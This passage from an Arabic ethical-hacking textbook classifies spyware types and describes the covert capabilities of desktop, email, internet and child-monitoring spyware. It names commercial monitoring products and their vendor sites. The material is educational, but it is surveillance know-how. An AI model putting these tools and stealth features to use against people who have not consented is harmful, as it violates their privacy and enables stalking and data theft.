‫رﺻد وﻛﺗﺎﺑﺔ ﺗﻘﺎرﯾر ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﯾزورھﺎ اﻟﮭدف‪.‬‬ ‫‪-‬‬

‫أﻧواع ﺑراﻣﺞ اﻟﺗﺟﺳس )‪(TYPES OF SPYWARE‬‬


‫ھﻧﺎك ‪ 10‬أﻧواع رﺋﯾﺳﯾﺔ ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟم ﻟﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻋن ﻧﺷﺎط‬
‫اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑدون ﻣواﻓﻘﺗﮫ وﻣﻌرﻓﺗﮫ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ھذه اﻷﻧواع اﻟﻌﺷرة اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪1. Desktop Spyware‬‬


‫‪2. Email and Internet Spyware‬‬
‫‪3. Child Monitoring Spyware‬‬
‫‪4. Video Spyware‬‬
‫‪5. Print Spyware‬‬
‫‪6. Screen Capturing Spyware‬‬
‫‪7. USB Spyware‬‬
‫‪8. Audio Spyware‬‬
‫‪9. GPS Spyware‬‬
‫‪10. Cell Phone and Telephone Spyware‬‬
‫‪Desktop Spyware‬‬

‫ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب )‪ (Desktop spyware‬ھو ﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم أو ﺟﻣﯾﻊ‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮭﺎ ﻋﺑر اﻹﻧﺗرﻧت إﻟﻰ أطراف ﺛﺎﻟﺛﺔ دون ﻋﻠم اﻟﻣﺳﺗﺧدم أو ﻣواﻓﻘﺗﮫ‪ .‬ﯾوﻓر ﻣﻌﻠوﻣﺎت ﺑﺷﺄن ﻣﺎ ﻓﻌﻠﮫ‬
‫ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ ﻋﻠﻰ ﺳطﺢ ﻣﻛﺎﺗﺑﮭم)‪ ،(Desktop‬وﻛﯾف‪ ،‬وﻣﺗﻰ‪.‬‬
‫ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ -1‬اﻟﺗﺳﺟﯾل اﻟﺣﻲ ﻟﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪.‬‬
‫‪ -2‬ﻣراﻗﺑﺔ وﺗﺳﺟﯾل أﻧﺷطﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -3‬ﺗﺳﺟﯾل اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت ﺑﺎﻟﺗوﻗﯾت‪.‬‬
‫‪ -4‬ﺗﺳﺟﯾل ﻣﻠﻔﺎت ﺳﺟل اﻟﻧﺷﺎط )‪ (activities logs‬وﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي واﺣد‪.‬‬
‫‪ -5‬ﺗﺳﺟﯾل ﺿرﺑﺎت ﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪416‬‬

‫‪Desktop Spyware: Activity Monitor‬‬


‫اﻟﻣﺻدر‪http://www.softactivity.com :‬‬
‫‪ Activity Monitor‬ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﺗﺑﻊ أي ‪ ،LAN‬ﻣﻣﺎ ﯾﻌطﯾك أﻛﺛر اﻟﻣﻌﻠوﻣﺎت ﺗﻔﺻﯾﻼ ﺑﺷﺄن ﻣﺎ‪ ،‬وﻛﯾف‪ ،‬وﻣﺗﻰ ﯾﻔﻌﻠﮫ‬
‫ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ﯾﺗﻛون ھذا اﻟﻧظﺎم ﻣن أﺟزاء ﻣن اﻟﺧﺎدم واﻟﻌﻣﯾل‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ﺧﺎدم ‪ Activity Monitor‬ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﻛﻠﮭﺎ‪ .‬ﺛم ﯾﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋن ﺑﻌد ﻋﻠﻰ ﻛﺎﻓﺔ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل اﻟﺗﻲ ﺗرﯾد ﻣراﻗﺑﺗﮭﺎ‪ .‬ﻣن‬
‫اﻟﻣﻌروف أﯾﺿﺎ أن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋن ﺑﻌد ﺗﻌرف أﯾﺿﺎ ب ‪ ،Agent‬وھو ﺑرﻧﺎﻣﺞ ﻋﻣﯾل ﺻﻐﯾر‪ Agent .‬ﯾﻣﻛن ﺗﺛﺑﯾﺗﮫ ﻋن ﺑﻌد ﻣن ﺧﻼل‬
‫ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﻊ ‪ Activity Monitor Server‬ﻋﻠﯾﮫ أو ﻋن طرﯾﻖ ‪ Active Directory Group Policy‬ﻓﻲ دوﻣﯾن‬
‫‪ .Windows‬أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ ﺗﺣت اﻟﺳﯾطرة ﯾﻣﻛن أن ﯾﺗﺟﺳس ﻋﻠﯾﮫ ﻋن ﺑﻌد ﻣﻊ ھذه اﻷداة ﻓﻘط ﻋن طرﯾﻖ ﺗﺛﺑﯾت ‪ Agent‬ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك ﺿﺑط ﺑرﻧﺎﻣﺞ ‪ Activity Monitor Server‬ﻟﺗﺳﺟﯾل أﻧﺷطﺔ ﺟﻣﯾﻊ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺗﺻﻠﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪.‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﻋرض ﻻﯾف ﻟﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد )اﻟﺻورة(‪.‬‬
‫‪ -‬ﻣن اﻟﺳﮭل ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت‪.‬‬
‫‪ -‬ﺗﺳﺟﯾل ﺳﺟل اﻟﻧﺷﺎطﺎت )‪ (activity log‬ﻟﺟﻣﯾﻊ أﻣﺎﻛن اﻟﻌﻣل ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي واﺣد ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟرﺋﯾﺳﻲ ﻣﻊ ﺗﺛﺑﯾت‬
‫‪.Activity Monitor‬‬
‫‪ -‬ﺗﺧزﯾن ﺗﻘرﯾر ﻛﺎﻣل ﻋن اﻻﺗﺻﺎﻻت ﻟﻛل ﻣﺳﺗﺧدم )رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺳﻠﺔ واﻟﻣﺳﺗﻠﻣﺔ‪ ،‬دردﺷﺎت اﻟﺗراﺳل اﻟﻔوري ورﺳﺎﺋل‬
‫ﻛﺗﺑﺗﮭﺎ ﻓﻲ اﻟﻣﻧﺗدﯾﺎت ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت(‪.‬‬
‫‪ -‬ﺗﺗﺑﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻷي ﻣﺳﺗﺧدم‪ ،‬ﺣﺗﻰ ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻟﺷﺎﺷﺔ‪ ،‬ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪.‬‬
‫‪ -‬اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺷﺑﻛﺎت اﻟﻛﻣﺑﯾوﺗر‪ .‬ﺑدء أو إﻧﮭﺎء اﻟﻌﻣﻠﯾﺎت ﻋن ﺑﻌد‪ ،‬ﺗﺷﻐﯾل اﻷواﻣر‪ ،‬ﻧﺳﺦ اﻟﻣﻠﻔﺎت ﻣن اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة‪ .‬ﻗد ﺗﺣﺗﺎج‬
‫ﻟﺗﺷﻐﯾل ﺣﺗﻰ ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر أو إﻋﺎدة ﺗﺷﻐﯾﻠﮫ‪ ،‬ﻧﺎھﯾك ﻋن ﺗﺳﺟﯾل ﺧروج اﻟﻣﺳﺗﺧدم اﻟﺣﺎﻟﻲ‪.‬‬
‫‪ -‬ﻧﺷر ‪) Activity Monitor Agent‬اﻟﺟزء اﻟﻌﻣﯾل ﻣن اﻟﺑرﻧﺎﻣﺞ( ﻋن ﺑﻌد ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳؤول ﻋﻠﻰ ﻛﺎﻓﺔ أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﺷﺑﻛﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪417‬‬

‫‪Desktop Spyware: other tools‬‬


‫ھﻧﺎك اﻟﻌدﯾد ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟم ﻟﻣراﻗﺑﺔ ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺳﺗﺧدم‬
‫اﻟﺑﻌﯾد‪ .‬ھذا اﻟﺗﺟﺳس ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟرﺻد وﺗﺳﺟﯾل ﻛل اﻟﺗﻔﺎﺻﯾل ﻋن ﻧﺷﺎط اﻟﻛﻣﺑﯾوﺗر واﻹﻧﺗرﻧت اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﺳﺟﯾل ﺿرﺑﺎت‬
‫اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬واﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬اﻟﺑراﻣﺞ ﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪ ،‬واﻷﺣﺎدﯾث‪ ،‬واﻻﺗﺻﺎﻻت‪ ،‬اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ واﻟدردﺷﺔ‪ ،‬وﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺗﺢ ‪ /‬إﻏﻼق اﻟﻧواﻓذ‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ أﺧذ ﻟﻘطﺎت ﻣن ﺳطﺢ اﻟﻣﻛﺗب اﻟﻣﺳﺗﺧدم اﻟﺑﻌﯾد وأﻛﺛر‬
‫ﻣن ذﻟك ﺑﻛﺛﯾر‪ .‬ﺑﻌض ﻣن ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب اﻟﺗﻲ ﻗد ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟﻣﯾن ﻟرﺻد ﺳطﺢ اﻟﻣﻛﺗب ﻋن ﺑﻌد ﻣدرﺟﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Remote Desktop Spy available at http://www.global-spy-software.com‬‬
‫‪SSPro available at http://www.gpsoftdev.com‬‬
‫‪RecoveryFix Employee Activity Monitor available at http://www.recoveryfix.com‬‬
‫‪Employee Desktop Live Viewer available at http://www.nucleustechnologies.com‬‬
‫‪NetVizor available at http://www.netvizor.net‬‬
‫‪Net Spy Pro available at http://www.net-monitoring-software.com‬‬
‫‪REFOG Employee Monitor available at http://www.refog.com‬‬
‫‪osMonitor available at http://www.os-monitor.com‬‬
‫‪LANVisor available at http://www.lanvisor.com‬‬
‫‪Work Examiner Standard available at http://www.workexaminer.com‬‬

‫‪Email and Internet Spyware‬‬

‫‪Email Spyware -1‬‬

‫‪ Email spyware‬ھو ﺑرﻧﺎﻣﺞ أو ﺗطﺑﯾﻖ ﻟرﺻد‪ ،‬وﺗﺳﺟﯾل‪ ،‬وﺗوﺟﯾﮫ ﻛﺎﻓﺔ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﺧدﻣﺎت‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺛل ‪ Hotmail‬وﺑرﯾد ﯾﺎھو‪ .‬ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺔ‪ ،‬ﻓﺎن ھذا اﻟﻧوع ﻣن ﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس‬
‫ﯾﺳﺟل وﯾرﺳل ﻧﺳﺧﺎ ﻣن ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة ﻟك ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد أو ﯾﺣﻔظﮫ ﻋﻠﻰ‬
‫ﻣﺟﻠد ﻓﻲ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻠﻛﻣﺑﯾوﺗر ﻟرﺻدھﺎ ﻻﺣﻘﺎ‪ .‬ﯾﻌﻣل ﻓﻲ اﻟوﺿﻊ ‪stealth mode‬؛ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن‬
‫وﺟود ﺑراﻣﺞ ﺗﺟﺳس اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮭم‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ اﻟﺗﻲ أﺟرﯾت ﻓﻲ‪،AIM :‬‬
‫‪ ،MSN‬ﯾﺎھو‪ ،‬ﻣﺎي ﺳﺑﯾس‪ ،‬اﻟﻔﯾﺳﺑوك‪ ،‬اﻟﺦ‪.‬‬

‫‪Internet Spyware -2‬‬

‫‪ Internet Spyware‬ھﻲ اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﻣﯾﻊ ﺻﻔﺣﺎت اﻟوﯾب اﻟﺗﻲ ﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻓﻲ ﻏﯾﺎﺑك‪ .‬ﻓﮭو ﯾﺟﻌل ﺳﺟل زﻣﻧﻲ ﻟﺟﻣﯾﻊ ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ .‬ھذا ﯾﺣﻣل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪.‬‬
‫ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻓﻲ اﻟوﺿﻊ ‪ ،stealth mode‬ﻣﻣﺎ ﯾﻌﻧﻲ أﻧﮫ ﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ وﻻ ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أﺑدا اﻟﻛﺷف‬
‫ﻋن ھذه اﻷداة اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻛﺗﺎﺑﺔ ﺟﻣﯾﻊ ﻋﻧﺎوﯾن ‪ URL‬اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻓﻲ ﻣﻠف اﻟﺳﺟل وإرﺳﺎﻟﮭﺎ إﻟﻰ‬
‫ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد‪ .‬ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻹﻧﺗرﻧت‪ ،‬ﯾﻣﻛن ﻟﻠﻣرء أداء ﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر‪ .‬ﺣﯾث اﻧﮫ ﯾوﻓر ﺗﻘرﯾرا ﻣوﺟزا ﻋن اﺳﺗﺧدام ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﺑﺷﻛل ﻋﺎم ﻣﺛل اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬واﻟوﻗت اﻟذي ﯾﻘﺿﯾﮫ ﻓﻲ ﻛل‬
‫ﻣوﻗﻊ‪ ،‬ﻓﺿﻼ ﻋن ﻓﺗﺢ ﻛﺎﻓﺔ اﻟﺗطﺑﯾﻘﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﻟﺗﺎرﯾﺦ ‪ /‬اﻟوﻗت‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﺳﻣﺢ ﻟك ﻟﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺻﻔﺣﺔ وﯾب ﻣﻌﯾﻧﺔ أو ﻣوﻗﻊ‬
‫ﻛﺎﻣل ﺑذﻛر ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ أو اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪.‬‬
‫‪Email and Internet Spyware: Power Spy‬‬
‫اﻟﻣﺻدر‪http://ematrixsoft.com :‬‬

‫ﺑرﻣﺟﯾﺎت ‪ Power Spy‬ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ﻣﻛﺎن ﺑﻌﯾد ﻛﻠﻣﺎ ﻛﻧت ﺑﻌﯾدا ﻋن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل‬
‫اﺳﺗﺧدام اﻟﻔﯾﺳﺑوك‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬وﻣواﻗﻊ اﻟوﯾب اﻟﺗﻲ ﻗﻣت ﺑزﯾﺎرﺗﮭﺎ‪ ،‬دردﺷﺎت ‪ IMS‬ﻓﻲ ‪Windows‬‬
‫‪،ICQ ،GADU-GADU ،Google Talk ،Tencent QQ ،Yahoo Messenger ،SKYPE ،(MSN) Live Messenger‬‬
‫‪ ،(AIM) AOL Instant Messenger‬وأﻛﺛر ﻣن ذﻟك‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل ﺑﯾﺎﻧﺎت ‪ ،clipboard‬وﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪418‬‬

‫ﺗﻣت ﻛﺗﺎﺑﺗﮭﺎ‪ ،‬ﻓﺗﺢ اﻟﻣﺳﺗﻧدات‪ ،‬ﻓﺗﺢ اﻟﻧواﻓذ‪ ،‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة‪ .‬ﯾﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻣﻊ ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪ ،‬وﯾﻌﻣل ﺳرا‪ ،‬وﯾرﺳل اﻟﺗﻘﺎرﯾر إﻟﻰ ﺳﺟل‬
‫ﺑرﯾدك اﻹﻟﻛﺗروﻧﻲ أو ‪ .FTP‬ﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن ھذه اﻟﺗﻘﺎرﯾر ﻓﻲ أي ﻣﻛﺎن ﺗرﯾد‪.‬‬

‫‪Internet and Email Spyware: other tools‬‬

‫‪ Internet and email Spyware‬ﯾﻘوم ﺑﺗﺳﺟﯾل ﻛﻣﺎ ﯾﻘوم ﺑﺎﺳﺗﻌراض ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪،‬‬
‫وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر‪ ،‬واﻷﻗراص‪ ،‬واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ‪ .‬ﺣﺗﻰ أﻧﮫ ﯾﺣﻣﻲ ﻋﺎﺋﻠﺗك ﻣن ﺧطر اﻻﻧﺗرﻧت وﯾﺣﻔظ اﻟﺷرﻛﺔ ﻣن‬
‫اﻟﻣﺧﺎطر واﻟﺧﺳﺎﺋر‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻹﻧﺗرﻧت واﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪eBLASTER available at http://www.spectorsoft.com‬‬
‫‪Imonitor Employee Activity available at http://www.employee-monitoring-software.cc‬‬
‫‪Employee monitoring available at http://employeemonitoring.net‬‬
‫‪OsMonitor available at http://www.os-monitor.com‬‬
‫‪Ascendant NFM available at http://www.ascendant-security.com‬‬
‫‪Spylab WebSpy available at http://www.spylab.org‬‬
‫‪Personal Inspector available at http://www.spyarsenal.com‬‬
‫‪Cyberspy available at http://www.cyberspysoftware.com‬‬
‫‪AceSpy available at http://www.acespy.com‬‬
‫‪Emailobserver available at http://www.softsecurity.com‬‬
‫‪Child Monitoring Spyware‬‬

‫‪ Child monitoring spyware‬ﺗﺳﻣﺢ ﻟك ﺑﺗﺗﺑﻊ و ﻣراﻗﺑﺔ ﻣﺎ ﯾﻘوم ﺑﮫ أطﻔﺎﻟك ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳواء ﻣﺗﺻﻼ ﺑﺎﻷﻧﺗرﻧت أو ﻏﯾر ﻣﺗﺻل‪ .‬ﻓﺑدﻻ‬
‫ﻣن اﻟﻧظر ﻋﻠﻰ ﻣﺎ ﯾﻘوم ﺑﮫ اﻟطﻔل ﻓﻲ ﻣرات ﻋده‪ ،‬ﻓﯾﻣﻛن ﻟﻠﻣرء اﺳﺗﺧدام ‪ Child monitoring spyware‬ﻓﻲ ﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ ﻗﺿﺎء اﻟوﻗت‬
‫ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ اﻟﺷﺑﺢ)‪ (Stealth mode‬؛ أطﻔﺎﻟك ﺳوف ﻻ ﯾﻌﻠﻣون ﺑﺣﻘﯾﻘﺔ أﻧك ﺗﺷﺎھدھم‪ .‬ﺑﻌد اﻟﺗﺛﺑﯾت‪ ،‬ﻓﺎن ھذا‬
‫اﻟﺗطﺑﯾﻖ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟﺑراﻣﺞ اﻟﻣﺳﺗﺧدﻣﺔ‪ ،‬واﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻧﻘرات اﻟﻣﺎوس‪ ،‬وأﺧذ ﻟﻘطﺎت ﻣن اﻟﻧﺷﺎط اﻟﺗﻲ‬
‫ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ‪ .‬ﺟﻣﯾﻊ اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﺧﻼل واﺟﮭﺔ اﻟوﯾب اﻟﻣﺣﻣﯾﺔ ﺑﻛﻠﻣﺔ ﻣرور‪.‬‬
‫ھذا ﯾﺳﻣﺢ ﻟك أﯾﺿﺎ ﺑﺣﻣﺎﯾﺔ أطﻔﺎﻟك ﻣن اﻟوﺻول إﻟﻰ ﻣﺣﺗوى وﯾب ﻏﯾر ﻣﻧﺎﺳب ﻣن ﺧﻼل وﺿﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﻣﺣددة اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ‪.‬‬
‫ﺣﯾث ﯾﻘوم ھذا اﻟﺗطﺑﯾﻖ ﺑﺈرﺳﺎل ﺗﻧﺑﯾﮫ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻛﻠﻣﺎ واﺟﮭت ﻛﻠﻣﺎت رﺋﯾﺳﯾﺔ ﻣﺣددة ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أو ﻛﻠﻣﺎ أراد‬
‫أطﻔﺎﻟك اﻟوﺻول اﻟﻰ ﻣﺣﺗوى ﻏﯾر ﻻﺋﻖ‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﺳﺟل اﻷﻧﺷطﺔ اﻟﻣﺧﺗﺎرة‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﻠﻘطﺎت‪ ،‬وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﻣواﻗﻊ اﻻﻧﺗرﻧت‪.‬‬
